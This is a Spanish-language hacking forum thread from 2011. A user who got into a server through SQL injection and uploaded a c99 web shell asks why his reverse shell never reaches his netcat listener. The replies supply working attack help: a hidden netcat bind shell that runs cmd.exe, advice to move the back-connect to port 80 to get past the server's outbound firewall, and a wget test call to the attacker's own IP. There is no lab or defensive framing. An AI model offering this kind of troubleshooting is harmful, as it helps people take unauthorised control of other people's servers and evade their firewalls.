consulta sobre shell y netcat

Iniciado por pedrosh20, 15 Noviembre 2011, 21:08 PM

0 Miembros y 2 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

pedrosh20

15 Noviembre 2011, 21:08 PM
bueno anduve practicando un poco de inyecciones sql y pude llegar a subir una shell c99.

he leido por ahi como rootear un server y lo he estado aplicando pero mi unico problema es que no me conecta la shell

en el back-connect de la shell c99 le coloco mi ip el puerto y en perl , luego dejo netcat a la escucha nc -l -v -p xxxx
y se queda escuchando nada mas(no hay conexion),  lo deje un buen rato.
(en los  papers se supone que deberia conectar.)

- no tengo ningun antivirus ni firewall
- probe tambien con backdoor en perl y nada

a que se puede deber este problema?
hay alguna otra forma de conectar a nc??
lalalalala

MauroMasciar

#1
16 Noviembre 2011, 14:44 PM
Lo tenes mal creado.. El correcto es asi:

nc.exe -L -d -p 5544 -e cmd.exe

-L a diferencia de -l, acepta mas de una conexion, en cambio con -l (minuscula) una vez terminada la primera conexion, cierra.
-d no muestra la ventana
-p puerto XXXX
y -e ejecuta un programa al conectarse, en este caso lo que queres (En caso de que sea windows, o mete el que necesites) el cmd.exe

Eso querias??

Saludos ^^
Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar

pedrosh20

#2
16 Noviembre 2011, 20:39 PM Ultima modificación: 16 Noviembre 2011, 20:42 PM por pedrosh20
es una shell c99 y en su apartado sale esto


Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p <port>"!
>server linux
>configuro HOST como mi ip y el puerto en la shellc99

configuro el nc en mi equipo >nc -l -v -p xxxx
pero se queda ahi escuchando nada mas ese es mi problema

lo ideal seria que conectara y luego rootear el server
lalalalala

WHK

#3
21 Noviembre 2011, 20:32 PM
está bien el comando, el netcat debe quedar a escucha "pero en tu pc" por lo tanto no necesitas dar como argumento el cmd.exe a menos que te quieras autotroyar xD o el servidor sea windows server.

Si no te conecta no te preocupes, no es tu firewall, debe ser el firewall del servidor y contra eso no puedes hacer nada, si esa conexión inversa no sirve es porque no sirve.

Intenta hacer lo mismo pero cambiale el puerto al 80, normalmente los firewalls dejan abierto el acceso a todos los puertos 80 remotos para utilizar wget, si  no te resulta prueba con dejarte a escucha al puerto 80 nuevamente pero ahora ejecutale un wget asi:
wget http://miip/
sy te sale la conexión en el netcat es porque de alguna forma el backdoor en perl no se está ejecutando y necesitas otra shell que si funcione.

ipwn

#4
24 Noviembre 2011, 04:45 AM
es possible que lo servidor en causa tiene iptables ou outro tipo de firewall que no deja hacer outbound connections..
Imprimir
Ir Arriba Páginas1
Acciones del Usuario